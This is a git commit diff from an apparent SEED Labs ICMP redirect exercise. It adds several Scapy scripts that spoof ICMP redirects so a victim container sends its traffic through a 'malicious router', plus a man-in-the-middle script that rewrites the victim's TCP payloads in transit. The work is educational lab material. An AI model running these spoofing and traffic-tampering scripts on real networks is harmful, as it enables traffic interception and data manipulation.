finished lab icmp

2026-04-08 12:32:51 +08:00
parent 25c3f55d19
commit adf2ddbdd5
12 changed files with 14671 additions and 170 deletions
--- a/ICMP_Directing/Labsetup/docker-compose.yml
+++ b/ICMP_Directing/Labsetup/docker-compose.yml
@@ -1,4 +1,4 @@
-version: "3"
+# version: "3"

 services:
    victim:
@@ -45,7 +45,6 @@ services:
                - net.ipv4.ip_forward=1
                - net.ipv4.conf.all.send_redirects=0
                - net.ipv4.conf.default.send_redirects=0
-                - net.ipv4.conf.eth0.send_redirects=0
        privileged: true
        volumes:
                - ./volumes:/volumes
--- a/ICMP_Directing/Labsetup/volumes/mitm_attack.py
+++ b/ICMP_Directing/Labsetup/volumes/mitm_attack.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python3
+from scapy.all import *
+
+def spoof_pkt(pkt):
+    # 如果是发往目标 192.168.60.5 的 TCP 数据包
+    if IP in pkt and pkt[IP].dst == '192.168.60.5' and TCP in pkt:
+        newpkt = IP(bytes(pkt[IP]))
+        del(newpkt.chksum)
+        del(newpkt[TCP].payload)
+        del(newpkt[TCP].chksum)
+
+        if pkt[TCP].payload:
+            data = pkt[TCP].payload.load
+            print(f"Original data: {data}")
+            # 修改内容，假设名字是 seedlabs -> AAAAAAAA
+            newdata = data.replace(b'seedlabs', b'AAAAAAAA')
+            send(newpkt/newdata, verbose=False)
+        else:
+            send(newpkt, verbose=False)
+
+# 过滤器只捕获受害者的包，避免拦截自己发出的包导致死循环
+f = 'tcp and src 10.9.0.5'
+print("MITM script starting on malicious-router...")
+sniff(iface='eth0', filter=f, prn=spoof_pkt)
--- a/ICMP_Directing/Labsetup/volumes/task1.py
+++ b/ICMP_Directing/Labsetup/volumes/task1.py
@@ -0,0 +1,21 @@
+#!/usr/bin/python3
+from scapy.all import *
+
+# ICMP Redirect packet
+# IP layer: src must be the current gateway, dst is the victim
+ip = IP(src='10.9.0.11', dst='10.9.0.5')
+# ICMP layer: type 5 is redirect, code 1 is for host
+icmp = ICMP(type=5, code=1)
+# The IP address of the new gateway
+icmp.gw = '10.9.0.111'
+
+# The ICMP Redirect packet must contain the original IP packet that triggered it
+# Victim's IP to the target destination
+ip2 = IP(src='10.9.0.5', dst='192.168.60.5')
+
+import time
+# Full packet construction: IP/ICMP/original-IP/original-ICMP
+pkt = ip/icmp/ip2/ICMP()
+while True:
+    send(pkt, iface='eth0', verbose=True)
+    time.sleep(1)
--- a/ICMP_Directing/Labsetup/volumes/task1_final_try.py
+++ b/ICMP_Directing/Labsetup/volumes/task1_final_try.py
@@ -0,0 +1,22 @@
+#!/usr/bin/python3
+from scapy.all import *
+import socket
+
+victim_ip = '10.9.0.5'
+target_ip = '192.168.60.5'
+gateway_ip = '10.9.0.11'
+malicious_router = '10.9.0.111'
+
+# 使用 IP 字符串，Scapy 应该能处理。如果不行，尝试 hex
+def send_redirect(pkt):
+    if ICMP in pkt and pkt[ICMP].type == 8:
+        print(f"Redirecting {pkt[IP].src} -> {pkt[IP].dst} via {malicious_router}")
+        ip = IP(src=gateway_ip, dst=victim_ip)
+        icmp = ICMP(type=5, code=1)
+        icmp.gw = malicious_router
+        # 精简负载：原始 IP 头 + 8 字节原始数据
+        load = bytes(pkt[IP])[:28] 
+        redirect_pkt = ip/icmp/IP(load)
+        send(redirect_pkt, iface='eth0', verbose=False)
+
+sniff(iface='eth0', filter=f"icmp and src {victim_ip} and dst {target_ip}", prn=send_redirect, count=20)
--- a/ICMP_Directing/Labsetup/volumes/task1_improved.py
+++ b/ICMP_Directing/Labsetup/volumes/task1_improved.py
@@ -0,0 +1,24 @@
+#!/usr/bin/python3
+from scapy.all import *
+import time
+
+# 原始网关是 10.9.0.11
+# 我们要受害者 (10.9.0.5) 将发往 192.168.60.5 的流量重定向到 10.9.0.111
+
+# 外层 IP 包：假装是网关发送的
+ip = IP(src='10.9.0.11', dst='10.9.0.5')
+# ICMP 重定向 (type=5, code=1: Redirect Host)
+icmp = ICMP(type=5, code=1)
+# 新网关
+icmp.gw = '10.9.0.111'
+
+# 包含在重定向包中的“触发包”负载
+# 必须匹配受害者正在发送或刚发送的内容
+ip2 = IP(src='10.9.0.5', dst='192.168.60.5')
+# ICMP echo request
+pkt = ip/icmp/ip2/ICMP()
+
+print("Sending ICMP Redirect packets...")
+for i in range(10):
+    send(pkt, iface='eth0', verbose=False)
+    time.sleep(0.5)
--- a/ICMP_Directing/Labsetup/volumes/task1_sniff_and_redirect.py
+++ b/ICMP_Directing/Labsetup/volumes/task1_sniff_and_redirect.py
@@ -0,0 +1,26 @@
+#!/usr/bin/python3
+from scapy.all import *
+
+victim_ip = '10.9.0.5'
+target_ip = '192.168.60.5'
+gateway_ip = '10.9.0.11'
+malicious_router = '10.9.0.111'
+
+def send_redirect(pkt):
+    if ICMP in pkt and pkt[ICMP].type == 8: # Echo Request
+        print(f"Captured packet from {pkt[IP].src} to {pkt[IP].dst}. Sending redirect...")
+        # 外层 IP 包
+        ip = IP(src=gateway_ip, dst=victim_ip)
+        # ICMP 重定向 (type=5, code=1)
+        icmp = ICMP(type=5, code=1)
+        # 有些 Scapy 版本对 gw 的处理有问题，直接使用其内部字段名或 hex
+        icmp.gw = malicious_router
+        # 负载应该是触发重定向的原始 IP 数据包
+        # 包括 IP 头部和至少 8 字节的原始负载
+        # 这里直接传整个 pkt[IP] 也是可以的
+        redirect_pkt = ip/icmp/pkt[IP]
+        print(f"Packet: {redirect_pkt.summary()}")
+        send(redirect_pkt, iface='eth0', verbose=True)
+
+print(f"Sniffing for packets from {victim_ip} to {target_ip}...")
+sniff(iface='eth0', filter=f"icmp and src {victim_ip} and dst {target_ip}", prn=send_redirect, count=10)